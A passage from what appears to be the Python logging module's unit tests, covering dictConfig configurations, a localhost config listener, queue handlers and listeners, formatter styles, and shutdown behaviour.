'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
